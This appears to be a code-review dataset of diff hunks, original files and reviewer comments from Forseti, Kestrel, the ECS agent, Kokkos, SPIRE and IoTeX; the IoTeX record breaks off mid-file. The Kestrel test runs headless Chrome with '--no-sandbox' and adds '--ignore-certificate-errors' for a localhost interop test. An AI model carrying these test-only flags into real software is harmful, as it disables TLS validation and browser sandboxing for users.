filename of the rules file. 
""" super(FwPolicyScanner, self).__init__( global_configs, scanner_configs, snapshot_timestamp, rules) self.rules_engine = fw_rules_engine.FirewallRuleEngine( rules_file_path=self.rules, snapshot_timestamp=self.snapshot_timestamp) self.rules_engine.build_rule_book(self.global_configs) @staticmethod def _flatten_violations(violations): """Flatten RuleViolations into a dict for each RuleViolation member. Args: violations (list): The RuleViolations to flatten. Yields: dict: Iterator of RuleViolations as a dict per member. """ for violation in violations: violation_data = {} violation_data['policy_names'] = violation.policy_names violation_data['recommended_actions'] = ( violation.recommended_actions) violation_dict = { 'resource_id': violation.resource_id, 'resource_type': violation.resource_type, 'rule_id': violation.rule_id, 'violation_type': violation.violation_type, 'violation_data': violation_data } sorted(violation_dict) yield violation_dict def _output_results(self, all_violations, resource_counts): """Output results. Args: all_violations (list): A list of violations resource_counts (int): Resource count. """ resource_name = 'violations' all_violations = list(self._flatten_violations(all_violations)) violation_errors = self._output_results_to_db(resource_name, all_violations) # Write the CSV for all the violations. # TODO: Move this into the base class? The IAP scanner version of this # is a wholesale copy. if self.scanner_configs.get('output_path'): LOGGER.info('Writing violations to csv...') output_csv_name = None with csv_writer.write_csv( resource_name=resource_name, data=all_violations, write_header=True) as csv_file: output_csv_name = csv_file.name LOGGER.info('CSV filename: %s', output_csv_name) # Scanner timestamp for output file and email. 
now_utc = datetime.utcnow() output_path = self.scanner_configs.get('output_path') if not output_path.startswith('gs://'): if not os.path.exists( self.scanner_configs.get('output_path')): os.makedirs(output_path) output_path = os.path.abspath(output_path) self._upload_csv(output_path, now_utc, output_csv_name) # Send summary email. # TODO: Untangle this email by looking for the csv content # from the saved copy. if self.global_configs.get('email_recipient') is not None: payload = { 'email_description': 'Policy Scan', 'email_sender': self.global_configs.get('email_sender'), 'email_recipient': self.global_configs.get('email_recipient'), 'sendgrid_api_key': self.global_configs.get('sendgrid_api_key'), 'output_csv_name': output_csv_name, 'output_filename': self._get_output_filename(now_utc), 'now_utc': now_utc, 'all_violations': all_violations, 'resource_counts': resource_counts, 'violation_errors': violation_errors } message = { 'status': 'scanner_done', 'payload': payload } notifier.process(message) def _find_violations(self, policies): """Find violations in the policies. Args: policies (list): The a list of resource and policy tuples to find violations in. Returns: list: A list of all violations """ policies = itertools.chain(policies) all_violations = [] LOGGER.info('Finding firewall policy violations...') for (resource, policy) in policies: LOGGER.debug('%s => %s', resource, policy) violations = self.rules_engine.find_policy_violations( resource, policy) all_violations.extend(violations) return all_violations def _retrieve(self): """Retrieves the data for scanner. Returns: list: List of firewall policy data. int: The resource count. """ firewall_policies = (firewall_rule_dao .FirewallRuleDao(self.global_configs) .get_firewall_rules(self.snapshot_timestamp)) if not firewall_policies: LOGGER.warn('No firewall policies found. 
Exiting.') sys.exit(1) return firewall_policies, len(firewall_policies) def run(self): """Runs the data collection.""" policy_data, resource_counts = self._retrieve() all_violations = self._find_violations(policy_data) self._output_results(all_violations, resource_counts)
1
27,963
pylint might complain that this isn't alphasorted?
forseti-security-forseti-security
py
@@ -52,6 +52,7 @@ namespace Interop.FunctionalTests $"--no-sandbox " + $"--disable-gpu " + $"--allow-insecure-localhost " + + $"--ignore-certificate-errors --enable-features=NetworkService " + $"--enable-logging " + $"--dump-dom " + $"--virtual-time-budget=10000 " +
1
// Copyright (c) .NET Foundation. All rights reserved. // Licensed under the Apache License, Version 2.0. See License.txt in the project root for license information. #if NETCOREAPP2_2 using System; using System.Diagnostics; using System.IO; using System.Net; using System.Threading.Tasks; using Microsoft.AspNetCore.Hosting; using Microsoft.AspNetCore.Http; using Microsoft.AspNetCore.Server.Kestrel.Core; using Microsoft.AspNetCore.Server.Kestrel.FunctionalTests; using Microsoft.AspNetCore.Testing; using Microsoft.AspNetCore.Testing.xunit; using Microsoft.Extensions.Logging; using Microsoft.Extensions.Logging.Testing; using Xunit; namespace Interop.FunctionalTests { [SkipIfChromeUnavailable] public class ChromeTests : LoggedTest { private static readonly string _postHtml = @"<!DOCTYPE html> <html> <head> <script type=""text/javascript""> function dosubmit() { document.forms[0].submit(); } </script> </head> <body onload=""dosubmit();""> <form action=""/"" method=""POST"" accept-charset=""utf-8""> </form> </body> </html>"; private string NetLogPath { get; set; } private string StartupLogPath { get; set; } private string ShutdownLogPath { get; set; } private string ChromeArgs { get; set; } private void InitializeArgs() { NetLogPath = Path.Combine(ResolvedLogOutputDirectory, $"{ResolvedTestMethodName}.nl.json"); StartupLogPath = Path.Combine(ResolvedLogOutputDirectory, $"{ResolvedTestMethodName}.su.json"); ShutdownLogPath = Path.Combine(ResolvedLogOutputDirectory, $"{ResolvedTestMethodName}.sd.json"); ChromeArgs = $"--headless " + $"--no-sandbox " + $"--disable-gpu " + $"--allow-insecure-localhost " + $"--enable-logging " + $"--dump-dom " + $"--virtual-time-budget=10000 " + $"--log-net-log={NetLogPath} " + $"--trace-startup --trace-startup-file={StartupLogPath} " + $"--trace-shutdown --trace-shutdown-file={ShutdownLogPath}"; } [ConditionalTheory] [OSSkipCondition(OperatingSystems.MacOSX, SkipReason = "Missing SslStream ALPN support: 
https://github.com/dotnet/corefx/issues/30492")] [MinimumOSVersion(OperatingSystems.Windows, WindowsVersions.Win81, SkipReason = "Missing Windows ALPN support: https://en.wikipedia.org/wiki/Application-Layer_Protocol_Negotiation#Support")] [InlineData("", "Interop HTTP/2 GET")] [InlineData("?TestMethod=POST", "Interop HTTP/2 POST")] public async Task Http2(string requestSuffix, string expectedResponse) { InitializeArgs(); using (var server = new TestServer(async context => { if (string.Equals(context.Request.Query["TestMethod"], "POST", StringComparison.OrdinalIgnoreCase)) { await context.Response.WriteAsync(_postHtml); } else { await context.Response.WriteAsync($"Interop {context.Request.Protocol} {context.Request.Method}"); } }, new TestServiceContext(LoggerFactory), options => options.Listen(IPAddress.Loopback, 0, listenOptions => { listenOptions.Protocols = HttpProtocols.Http2; listenOptions.UseHttps(TestResources.GetTestCertificate()); }))) { var chromeOutput = await RunHeadlessChrome($"https://localhost:{server.Port}/{requestSuffix}"); AssertExpectedResponseOrShowDebugInstructions(expectedResponse, chromeOutput); } } private async Task<string> RunHeadlessChrome(string testUrl) { var chromeArgs = $"{ChromeArgs} {testUrl}"; var chromeStartInfo = new ProcessStartInfo { FileName = ChromeConstants.ExecutablePath, Arguments = chromeArgs, UseShellExecute = false, CreateNoWindow = true, RedirectStandardError = true, RedirectStandardOutput = true }; Logger.LogInformation($"Staring chrome: {ChromeConstants.ExecutablePath} {chromeArgs}"); var headlessChromeProcess = Process.Start(chromeStartInfo); var chromeOutput = await headlessChromeProcess.StandardOutput.ReadToEndAsync(); var chromeError = await headlessChromeProcess.StandardError.ReadToEndAsync(); Logger.LogInformation($"Standard output: {chromeOutput}"); Logger.LogInformation($"Standard error: {chromeError}"); headlessChromeProcess.WaitForExit(); return chromeOutput; } private void 
AssertExpectedResponseOrShowDebugInstructions(string expectedResponse, string actualResponse) { try { Assert.Contains(expectedResponse, actualResponse); } catch { Logger.LogError("Chrome interop tests failed. Please consult the following logs:"); Logger.LogError($"Network logs: {NetLogPath}"); Logger.LogError($"Startup logs: {StartupLogPath}"); Logger.LogError($"Shutdown logs: {ShutdownLogPath}"); throw; } } } } #elif NET461 // No ALPN support #else #error TFMs need updating #endif
1
17,134
It seems that NetworkService is behind a feature flag because it's still experimental. If we see new issues, we should look at flipping this back off.
aspnet-KestrelHttpServer
.cs
@@ -31,6 +31,19 @@ func (ts *TaskStatus) String() string { return "UNKNOWN" } +// Mapping task status in the agent to that in the backend +func BackEndStatus(ts *TaskStatus) string { + switch *ts { + case TaskRunning: + return "RUNNING" + case TaskStopped: + return "STOPPED" + case TaskDead: + return "STOPPED" + } + return "PENDING" +} + var containerStatusMap = map[string]ContainerStatus{ "NONE": ContainerStatusNone, "UNKNOWN": ContainerStatusUnknown,
1
// Copyright 2014-2015 Amazon.com, Inc. or its affiliates. All Rights Reserved. // // Licensed under the Apache License, Version 2.0 (the "License"). You may // not use this file except in compliance with the License. A copy of the // License is located at // // http://aws.amazon.com/apache2.0/ // // or in the "license" file accompanying this file. This file is distributed // on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either // express or implied. See the License for the specific language governing // permissions and limitations under the License. package api var taskStatusMap = map[string]TaskStatus{ "NONE": TaskStatusNone, "UNKNOWN": TaskStatusUnknown, "CREATED": TaskCreated, "RUNNING": TaskRunning, "STOPPED": TaskStopped, "DEAD": TaskDead, } func (ts *TaskStatus) String() string { for k, v := range taskStatusMap { if v == *ts { return k } } return "UNKNOWN" } var containerStatusMap = map[string]ContainerStatus{ "NONE": ContainerStatusNone, "UNKNOWN": ContainerStatusUnknown, "PULLED": ContainerPulled, "CREATED": ContainerCreated, "RUNNING": ContainerRunning, "STOPPED": ContainerStopped, "DEAD": ContainerDead, } func (cs *ContainerStatus) String() string { for k, v := range containerStatusMap { if v == *cs { return k } } return "UNKNOWN" } func (cs *ContainerStatus) TaskStatus() TaskStatus { switch *cs { case ContainerStatusNone: return TaskStatusNone case ContainerCreated: return TaskCreated case ContainerRunning: return TaskRunning case ContainerStopped: return TaskStopped case ContainerDead: return TaskDead } return TaskStatusUnknown } func (ts *TaskStatus) ContainerStatus() ContainerStatus { switch *ts { case TaskStatusNone: return ContainerStatusNone case TaskCreated: return ContainerCreated case TaskRunning: return ContainerRunning case TaskStopped: return ContainerStopped case TaskDead: return ContainerDead } return ContainerStatusUnknown } func (cs *ContainerStatus) Terminal() bool { if cs == nil { return false } return *cs == 
ContainerStopped || *cs == ContainerDead } func (ts *TaskStatus) Terminal() bool { if ts == nil { return false } return *ts == TaskStopped || *ts == TaskDead }
1
13,286
I think it makes more sense to have this be a method on TaskStatus. Also, nit, Backend, not BackEnd.
aws-amazon-ecs-agent
go
@@ -154,6 +154,10 @@ int HIPInternal::verify_is_initialized(const char *const label) const { return 0 <= m_hipDev; } +uint32_t HIPInternal::impl_get_instance_id() const noexcept { + return Kokkos::Tools::Experimental::Impl::idForInstance< + Kokkos::Experimental::HIP>(reinterpret_cast<uintptr_t>(this)); +} HIPInternal &HIPInternal::singleton() { static HIPInternal *self = nullptr; if (!self) {
1
/* //@HEADER // ************************************************************************ // // Kokkos v. 3.0 // Copyright (2020) National Technology & Engineering // Solutions of Sandia, LLC (NTESS). // // Under the terms of Contract DE-NA0003525 with NTESS, // the U.S. Government retains certain rights in this software. // // Redistribution and use in source and binary forms, with or without // modification, are permitted provided that the following conditions are // met: // // 1. Redistributions of source code must retain the above copyright // notice, this list of conditions and the following disclaimer. // // 2. Redistributions in binary form must reproduce the above copyright // notice, this list of conditions and the following disclaimer in the // documentation and/or other materials provided with the distribution. // // 3. Neither the name of the Corporation nor the names of the // contributors may be used to endorse or promote products derived from // this software without specific prior written permission. // // THIS SOFTWARE IS PROVIDED BY NTESS "AS IS" AND ANY // EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE // IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR // PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL NTESS OR THE // CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, // EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, // PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR // PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF // LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING // NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS // SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. // // Questions? Contact Christian R. 
Trott ([email protected]) // // ************************************************************************ //@HEADER */ /*--------------------------------------------------------------------------*/ /* Kokkos interfaces */ #include <Kokkos_Core.hpp> #include <HIP/Kokkos_HIP_Instance.hpp> #include <Kokkos_HIP.hpp> #include <Kokkos_HIP_Space.hpp> #include <impl/Kokkos_Error.hpp> /*--------------------------------------------------------------------------*/ /* Standard 'C' libraries */ #include <stdlib.h> /* Standard 'C++' libraries */ #include <iostream> #include <sstream> #include <string> #include <vector> namespace Kokkos { namespace Experimental { namespace { class HIPInternalDevices { public: enum { MAXIMUM_DEVICE_COUNT = 64 }; struct hipDeviceProp_t m_hipProp[MAXIMUM_DEVICE_COUNT]; int m_hipDevCount; HIPInternalDevices(); static HIPInternalDevices const &singleton(); }; HIPInternalDevices::HIPInternalDevices() { HIP_SAFE_CALL(hipGetDeviceCount(&m_hipDevCount)); if (m_hipDevCount > MAXIMUM_DEVICE_COUNT) { Kokkos::abort( "Sorry, you have more GPUs per node than we thought anybody would ever " "have. Please report this to github.com/kokkos/kokkos."); } for (int i = 0; i < m_hipDevCount; ++i) { HIP_SAFE_CALL(hipGetDeviceProperties(m_hipProp + i, i)); } } const HIPInternalDevices &HIPInternalDevices::singleton() { static HIPInternalDevices self; return self; } } // namespace namespace Impl { //---------------------------------------------------------------------------- void HIPInternal::print_configuration(std::ostream &s) const { const HIPInternalDevices &dev_info = HIPInternalDevices::singleton(); s << "macro KOKKOS_ENABLE_HIP : defined" << '\n'; #if defined(HIP_VERSION) s << "macro HIP_VERSION = " << HIP_VERSION << " = version " << HIP_VERSION / 100 << "." 
<< HIP_VERSION % 100 << '\n'; #endif for (int i = 0; i < dev_info.m_hipDevCount; ++i) { s << "Kokkos::Experimental::HIP[ " << i << " ] " << dev_info.m_hipProp[i].name << " version " << (dev_info.m_hipProp[i].major) << "." << dev_info.m_hipProp[i].minor << ", Total Global Memory: " << ::Kokkos::Impl::human_memory_size(dev_info.m_hipProp[i].totalGlobalMem) << ", Shared Memory per Block: " << ::Kokkos::Impl::human_memory_size( dev_info.m_hipProp[i].sharedMemPerBlock); if (m_hipDev == i) s << " : Selected"; s << '\n'; } } //---------------------------------------------------------------------------- HIPInternal::~HIPInternal() { if (m_scratchSpace || m_scratchFlags || m_scratchConcurrentBitset) { std::cerr << "Kokkos::Experimental::HIP ERROR: Failed to call " "Kokkos::Experimental::HIP::finalize()" << std::endl; std::cerr.flush(); } m_hipDev = -1; m_hipArch = -1; m_multiProcCount = 0; m_maxWarpCount = 0; m_maxSharedWords = 0; m_maxShmemPerBlock = 0; m_scratchSpaceCount = 0; m_scratchFlagsCount = 0; m_scratchSpace = nullptr; m_scratchFlags = nullptr; m_scratchConcurrentBitset = nullptr; m_stream = nullptr; } int HIPInternal::verify_is_initialized(const char *const label) const { if (m_hipDev < 0) { std::cerr << "Kokkos::Experimental::HIP::" << label << " : ERROR device not initialized" << std::endl; } return 0 <= m_hipDev; } HIPInternal &HIPInternal::singleton() { static HIPInternal *self = nullptr; if (!self) { self = new HIPInternal(); } return *self; } void HIPInternal::fence() const { HIP_SAFE_CALL(hipStreamSynchronize(m_stream)); // can reset our cycle id now as well m_cycleId = 0; } void HIPInternal::initialize(int hip_device_id, hipStream_t stream) { if (was_finalized) Kokkos::abort("Calling HIP::initialize after HIP::finalize is illegal\n"); if (is_initialized()) return; int constexpr WordSize = sizeof(size_type); if (!HostSpace::execution_space::impl_is_initialized()) { const std::string msg( "HIP::initialize ERROR : HostSpace::execution_space " "is not 
initialized"); Kokkos::Impl::throw_runtime_exception(msg); } const HIPInternalDevices &dev_info = HIPInternalDevices::singleton(); const bool ok_init = nullptr == m_scratchSpace || nullptr == m_scratchFlags; // Need at least a GPU device const bool ok_id = 0 <= hip_device_id && hip_device_id < dev_info.m_hipDevCount; if (ok_init && ok_id) { const struct hipDeviceProp_t &hipProp = dev_info.m_hipProp[hip_device_id]; m_hipDev = hip_device_id; m_deviceProp = hipProp; HIP_SAFE_CALL(hipSetDevice(m_hipDev)); m_stream = stream; m_team_scratch_current_size = 0; m_team_scratch_ptr = nullptr; // number of multiprocessors m_multiProcCount = hipProp.multiProcessorCount; //---------------------------------- // Maximum number of warps, // at most one warp per thread in a warp for reduction. m_maxWarpCount = hipProp.maxThreadsPerBlock / Impl::HIPTraits::WarpSize; if (HIPTraits::WarpSize < m_maxWarpCount) { m_maxWarpCount = Impl::HIPTraits::WarpSize; } m_maxSharedWords = hipProp.sharedMemPerBlock / WordSize; //---------------------------------- // Maximum number of blocks m_maxBlock = hipProp.maxGridSize[0]; // theoretically, we can get 40 WF's / CU, but only can sustain 32 // see // https://github.com/ROCm-Developer-Tools/HIP/blob/a0b5dfd625d99af7e288629747b40dd057183173/vdi/hip_platform.cpp#L742 m_maxBlocksPerSM = 32; // FIXME_HIP - Nick to implement this upstream // Register count comes from Sec. 2.2. "Data Sharing" of the // Vega 7nm ISA document (see the diagram) // https://developer.amd.com/wp-content/resources/Vega_7nm_Shader_ISA.pdf // VGPRS = 4 (SIMD/CU) * 256 VGPR/SIMD * 64 registers / VGPR = // 65536 VGPR/CU m_regsPerSM = 65536; m_shmemPerSM = hipProp.maxSharedMemoryPerMultiProcessor; m_maxShmemPerBlock = hipProp.sharedMemPerBlock; m_maxThreadsPerSM = m_maxBlocksPerSM * HIPTraits::WarpSize; //---------------------------------- // Multiblock reduction uses scratch flags for counters // and scratch space for partial reduction values. // Allocate some initial space. 
This will grow as needed. { const unsigned reduce_block_count = m_maxWarpCount * Impl::HIPTraits::WarpSize; (void)scratch_flags(reduce_block_count * 2 * sizeof(size_type)); (void)scratch_space(reduce_block_count * 16 * sizeof(size_type)); } //---------------------------------- // Concurrent bitset for obtaining unique tokens from within // an executing kernel. { const int32_t buffer_bound = Kokkos::Impl::concurrent_bitset::buffer_bound(HIP::concurrency()); // Allocate and initialize uint32_t[ buffer_bound ] using Record = Kokkos::Impl::SharedAllocationRecord<Kokkos::Experimental::HIPSpace, void>; Record *const r = Record::allocate(Kokkos::Experimental::HIPSpace(), "Kokkos::InternalScratchBitset", sizeof(uint32_t) * buffer_bound); Record::increment(r); m_scratchConcurrentBitset = reinterpret_cast<uint32_t *>(r->data()); HIP_SAFE_CALL(hipMemset(m_scratchConcurrentBitset, 0, sizeof(uint32_t) * buffer_bound)); } //---------------------------------- } else { std::ostringstream msg; msg << "Kokkos::Experimental::HIP::initialize(" << hip_device_id << ") FAILED"; if (!ok_init) { msg << " : Already initialized"; } if (!ok_id) { msg << " : Device identifier out of range " << "[0.." 
<< dev_info.m_hipDevCount - 1 << "]"; } Kokkos::Impl::throw_runtime_exception(msg.str()); } // Init the array for used for arbitrarily sized atomics if (m_stream == nullptr) ::Kokkos::Impl::initialize_host_hip_lock_arrays(); } //---------------------------------------------------------------------------- using ScratchGrain = Kokkos::Experimental::HIP::size_type[Impl::HIPTraits::WarpSize]; enum { sizeScratchGrain = sizeof(ScratchGrain) }; Kokkos::Experimental::HIP::size_type *HIPInternal::scratch_space( const Kokkos::Experimental::HIP::size_type size) { if (verify_is_initialized("scratch_space") && m_scratchSpaceCount * sizeScratchGrain < size) { m_scratchSpaceCount = (size + sizeScratchGrain - 1) / sizeScratchGrain; using Record = Kokkos::Impl::SharedAllocationRecord<Kokkos::Experimental::HIPSpace, void>; if (m_scratchSpace) Record::decrement(Record::get_record(m_scratchSpace)); Record *const r = Record::allocate( Kokkos::Experimental::HIPSpace(), "Kokkos::InternalScratchSpace", (sizeScratchGrain * m_scratchSpaceCount)); Record::increment(r); m_scratchSpace = reinterpret_cast<size_type *>(r->data()); } return m_scratchSpace; } Kokkos::Experimental::HIP::size_type *HIPInternal::scratch_flags( const Kokkos::Experimental::HIP::size_type size) { if (verify_is_initialized("scratch_flags") && m_scratchFlagsCount * sizeScratchGrain < size) { m_scratchFlagsCount = (size + sizeScratchGrain - 1) / sizeScratchGrain; using Record = Kokkos::Impl::SharedAllocationRecord<Kokkos::Experimental::HIPSpace, void>; if (m_scratchFlags) Record::decrement(Record::get_record(m_scratchFlags)); Record *const r = Record::allocate( Kokkos::Experimental::HIPSpace(), "Kokkos::InternalScratchFlags", (sizeScratchGrain * m_scratchFlagsCount)); Record::increment(r); m_scratchFlags = reinterpret_cast<size_type *>(r->data()); HIP_SAFE_CALL( hipMemset(m_scratchFlags, 0, m_scratchFlagsCount * sizeScratchGrain)); } return m_scratchFlags; } void *HIPInternal::resize_team_scratch_space(std::int64_t bytes, 
bool force_shrink) { if (m_team_scratch_current_size == 0) { m_team_scratch_current_size = bytes; m_team_scratch_ptr = Kokkos::kokkos_malloc<Kokkos::Experimental::HIPSpace>( "Kokkos::HIPSpace::TeamScratchMemory", m_team_scratch_current_size); } if ((bytes > m_team_scratch_current_size) || ((bytes < m_team_scratch_current_size) && (force_shrink))) { m_team_scratch_current_size = bytes; m_team_scratch_ptr = Kokkos::kokkos_realloc<Kokkos::Experimental::HIPSpace>( m_team_scratch_ptr, m_team_scratch_current_size); } return m_team_scratch_ptr; } //---------------------------------------------------------------------------- void HIPInternal::finalize() { this->fence(); was_finalized = true; if (nullptr != m_scratchSpace || nullptr != m_scratchFlags) { using RecordHIP = Kokkos::Impl::SharedAllocationRecord<Kokkos::Experimental::HIPSpace>; RecordHIP::decrement(RecordHIP::get_record(m_scratchFlags)); RecordHIP::decrement(RecordHIP::get_record(m_scratchSpace)); RecordHIP::decrement(RecordHIP::get_record(m_scratchConcurrentBitset)); if (m_team_scratch_current_size > 0) Kokkos::kokkos_free<Kokkos::Experimental::HIPSpace>(m_team_scratch_ptr); m_hipDev = -1; m_hipArch = -1; m_multiProcCount = 0; m_maxWarpCount = 0; m_maxBlock = 0; m_maxSharedWords = 0; m_maxShmemPerBlock = 0; m_scratchSpaceCount = 0; m_scratchFlagsCount = 0; m_scratchSpace = nullptr; m_scratchFlags = nullptr; m_scratchConcurrentBitset = nullptr; m_stream = nullptr; m_team_scratch_current_size = 0; m_team_scratch_ptr = nullptr; } if (nullptr != d_driverWorkArray) { HIP_SAFE_CALL(hipHostFree(d_driverWorkArray)); d_driverWorkArray = nullptr; } } char *HIPInternal::get_next_driver(size_t driverTypeSize) const { std::lock_guard<std::mutex> const lock(m_mutexWorkArray); if (d_driverWorkArray == nullptr) { HIP_SAFE_CALL( hipHostMalloc(&d_driverWorkArray, m_maxDriverCycles * m_maxDriverTypeSize * sizeof(char), hipHostMallocNonCoherent)); } if (driverTypeSize > m_maxDriverTypeSize) { // fence handles the cycle id reset 
for us fence(); HIP_SAFE_CALL(hipHostFree(d_driverWorkArray)); m_maxDriverTypeSize = driverTypeSize; if (m_maxDriverTypeSize % 128 != 0) m_maxDriverTypeSize = m_maxDriverTypeSize + 128 - m_maxDriverTypeSize % 128; HIP_SAFE_CALL( hipHostMalloc(&d_driverWorkArray, m_maxDriverCycles * m_maxDriverTypeSize * sizeof(char), hipHostMallocNonCoherent)); } else { m_cycleId = (m_cycleId + 1) % m_maxDriverCycles; if (m_cycleId == 0) { // ensure any outstanding kernels are completed before we wrap around fence(); } } return &d_driverWorkArray[m_maxDriverTypeSize * m_cycleId]; } //---------------------------------------------------------------------------- Kokkos::Experimental::HIP::size_type hip_internal_multiprocessor_count() { return HIPInternal::singleton().m_multiProcCount; } Kokkos::Experimental::HIP::size_type hip_internal_maximum_warp_count() { return HIPInternal::singleton().m_maxWarpCount; } Kokkos::Experimental::HIP::size_type hip_internal_maximum_grid_count() { return HIPInternal::singleton().m_maxBlock; } Kokkos::Experimental::HIP::size_type *hip_internal_scratch_space( const Kokkos::Experimental::HIP::size_type size) { return HIPInternal::singleton().scratch_space(size); } Kokkos::Experimental::HIP::size_type *hip_internal_scratch_flags( const Kokkos::Experimental::HIP::size_type size) { return HIPInternal::singleton().scratch_flags(size); } } // namespace Impl } // namespace Experimental } // namespace Kokkos //---------------------------------------------------------------------------- namespace Kokkos { namespace Impl { void hip_device_synchronize() { HIP_SAFE_CALL(hipDeviceSynchronize()); } void hip_internal_error_throw(hipError_t e, const char *name, const char *file, const int line) { std::ostringstream out; out << name << " error( " << hipGetErrorName(e) << "): " << hipGetErrorString(e); if (file) { out << " " << file << ":" << line; } throw_runtime_exception(out.str()); } } // namespace Impl } // namespace Kokkos 
//---------------------------------------------------------------------------- namespace Kokkos { namespace Experimental { HIP::size_type HIP::detect_device_count() { return HIPInternalDevices::singleton().m_hipDevCount; } } // namespace Experimental } // namespace Kokkos
1
28,750
Could you please elaborate on why you need all this magic here? In which cases do you want the same id to be returned? Does this work the same way for all backends?
kokkos-kokkos
cpp
@@ -38,11 +38,8 @@ var ( ) type Config struct { - // Directory in which plugin config files - // reside - ConfigDir string - - Log logrus.FieldLogger + PluginsConfigs map[string]map[string]common.HclPluginConfig + Log logrus.FieldLogger } type catalog struct {
1
package catalog import ( "fmt" "sync" "github.com/sirupsen/logrus" // Plugin interfaces "github.com/spiffe/spire/proto/agent/keymanager" "github.com/spiffe/spire/proto/agent/nodeattestor" "github.com/spiffe/spire/proto/agent/workloadattestor" goplugin "github.com/hashicorp/go-plugin" common "github.com/spiffe/spire/pkg/common/catalog" ) const ( KeyManagerType = "KeyManager" NodeAttestorType = "NodeAttestor" WorkloadAttestorType = "WorkloadAttestor" ) type Catalog interface { common.Catalog KeyManagers() []keymanager.KeyManager NodeAttestors() []nodeattestor.NodeAttestor WorkloadAttestors() []workloadattestor.WorkloadAttestor } var ( supportedPlugins = map[string]goplugin.Plugin{ KeyManagerType: &keymanager.KeyManagerPlugin{}, NodeAttestorType: &nodeattestor.NodeAttestorPlugin{}, WorkloadAttestorType: &workloadattestor.WorkloadAttestorPlugin{}, } ) type Config struct { // Directory in which plugin config files // reside ConfigDir string Log logrus.FieldLogger } type catalog struct { com common.Catalog m *sync.RWMutex keyManagerPlugins []keymanager.KeyManager nodeAttestorPlugins []nodeattestor.NodeAttestor workloadAttestorPlugins []workloadattestor.WorkloadAttestor } func New(c *Config) Catalog { commonConfig := &common.Config{ ConfigDir: c.ConfigDir, SupportedPlugins: supportedPlugins, Log: c.Log, } return &catalog{ com: common.New(commonConfig), m: new(sync.RWMutex), } } func (c *catalog) Run() error { c.m.Lock() defer c.m.Unlock() err := c.com.Run() if err != nil { return err } return c.categorize() } func (c *catalog) Stop() { c.m.Lock() defer c.m.Unlock() c.com.Stop() c.reset() return } func (c *catalog) Reload() error { c.m.Lock() defer c.m.Unlock() err := c.com.Reload() if err != nil { return err } return c.categorize() } func (c *catalog) Plugins() []*common.ManagedPlugin { c.m.RLock() defer c.m.RUnlock() return c.com.Plugins() } func (c *catalog) Find(plugin common.Plugin) *common.ManagedPlugin { c.m.RLock() defer c.m.RUnlock() return c.com.Find(plugin) } 
func (c *catalog) KeyManagers() []keymanager.KeyManager { c.m.RLock() defer c.m.RUnlock() return c.keyManagerPlugins } func (c *catalog) NodeAttestors() []nodeattestor.NodeAttestor { c.m.RLock() defer c.m.RUnlock() return c.nodeAttestorPlugins } func (c *catalog) WorkloadAttestors() []workloadattestor.WorkloadAttestor { c.m.RLock() defer c.m.RUnlock() return c.workloadAttestorPlugins } // categorize iterates over all managed plugins and casts them into their // respective client types. This method is called during Run and Reload // to prevent the consumer from having to check for errors when fetching // a client from the catalog func (c *catalog) categorize() error { c.reset() errMsg := "Plugin %s does not adhere to %s interface" for _, p := range c.com.Plugins() { switch p.Config.PluginType { case KeyManagerType: pl, ok := p.Plugin.(keymanager.KeyManager) if !ok { return fmt.Errorf(errMsg, p.Config.PluginName, KeyManagerType) } c.keyManagerPlugins = append(c.keyManagerPlugins, pl) case NodeAttestorType: pl, ok := p.Plugin.(nodeattestor.NodeAttestor) if !ok { return fmt.Errorf(errMsg, p.Config.PluginName, NodeAttestorType) } c.nodeAttestorPlugins = append(c.nodeAttestorPlugins, pl) case WorkloadAttestorType: pl, ok := p.Plugin.(workloadattestor.WorkloadAttestor) if !ok { return fmt.Errorf(errMsg, p.Config.PluginName, WorkloadAttestorType) } c.workloadAttestorPlugins = append(c.workloadAttestorPlugins, pl) default: return fmt.Errorf("Unsupported plugin type %s", p.Config.PluginType) } } // Guarantee we have at least one of each type pluginCount := map[string]int{} pluginCount[KeyManagerType] = len(c.keyManagerPlugins) pluginCount[NodeAttestorType] = len(c.nodeAttestorPlugins) pluginCount[WorkloadAttestorType] = len(c.workloadAttestorPlugins) for t, c := range pluginCount { if c < 1 { return fmt.Errorf("At least one plugin of type %s is required", t) } } return nil } func (c *catalog) reset() { c.keyManagerPlugins = nil c.nodeAttestorPlugins = nil 
c.workloadAttestorPlugins = nil }
1
9,033
nit: `PluginConfigs` feels a little better
spiffe-spire
go
@@ -323,7 +323,7 @@ func TestLocalTransfer(t *testing.T) { probeSvr := probe.New(7788) require.NoError(probeSvr.Start(ctx)) defer func() { - require.NoError(probeSvr.Stop(ctx)) + probeSvr.Stop(ctx) }() // Start server
1
// Copyright (c) 2019 IoTeX Foundation // This is an alpha (internal) release and is not suitable for production. This source code is provided 'as is' and no // warranties are given as to title or non-infringement, merchantability or fitness for purpose and, to the extent // permitted by law, all liability for your use of the code is disclaimed. This source code is governed by Apache // License 2.0 that can be found in the LICENSE file. package e2etest import ( "context" "fmt" "math/big" "math/rand" "testing" "time" "github.com/cenkalti/backoff" "github.com/stretchr/testify/require" "google.golang.org/grpc" "github.com/iotexproject/go-pkgs/crypto" "github.com/iotexproject/iotex-address/address" "github.com/iotexproject/iotex-proto/golang/iotexapi" "github.com/iotexproject/iotex-core/action" accountutil "github.com/iotexproject/iotex-core/action/protocol/account/util" "github.com/iotexproject/iotex-core/blockchain" "github.com/iotexproject/iotex-core/config" "github.com/iotexproject/iotex-core/pkg/probe" "github.com/iotexproject/iotex-core/server/itx" "github.com/iotexproject/iotex-core/state/factory" "github.com/iotexproject/iotex-core/test/identityset" "github.com/iotexproject/iotex-core/testutil" ) type TransferState int const ( //This transfer should fail to be accepted into action pool TsfFail TransferState = iota //This transfer should be accepted into action pool, //and later on be minted into block chain after block creating interval TsfSuccess //This transfer should be accepted into 